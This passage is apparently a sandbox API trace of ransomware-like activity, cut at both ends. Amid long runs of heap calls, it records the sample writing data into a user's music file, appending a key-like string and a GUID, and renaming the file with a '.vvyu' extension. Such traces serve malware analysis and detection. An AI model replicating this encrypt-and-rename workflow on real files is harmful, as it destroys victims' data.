Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0198.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeab18 | out: hHeap=0x2c0000) returned 1 [0198.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.218] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x1019f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1019f, lpOverlapped=0x0) returned 1 [0198.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.219] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x101a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.219] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.221] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.222] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.222] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.222] CloseHandle (hObject=0x584) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0198.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.224] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\zPa wj4.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\zpa wj4.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\zPa wj4.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\zpa wj4.m4a.vvyu")) returned 1 [0198.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.229] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.232] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7af5f380, ftCreationTime.dwHighDateTime=0x1d8a04b, ftLastAccessTime.dwLowDateTime=0x25602a90, ftLastAccessTime.dwHighDateTime=0x1d8a14e, ftLastWriteTime.dwLowDateTime=0x25602a90, ftLastWriteTime.dwHighDateTime=0x1d8a14e, nFileSizeHigh=0x0, nFileSizeLow=0x101a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zPa wj4.m4a", cAlternateFileName="ZPAWJ4~1.M4A")) returned 0 [0198.232] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0198.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0198.233] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0198.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0198.233] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0198.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: 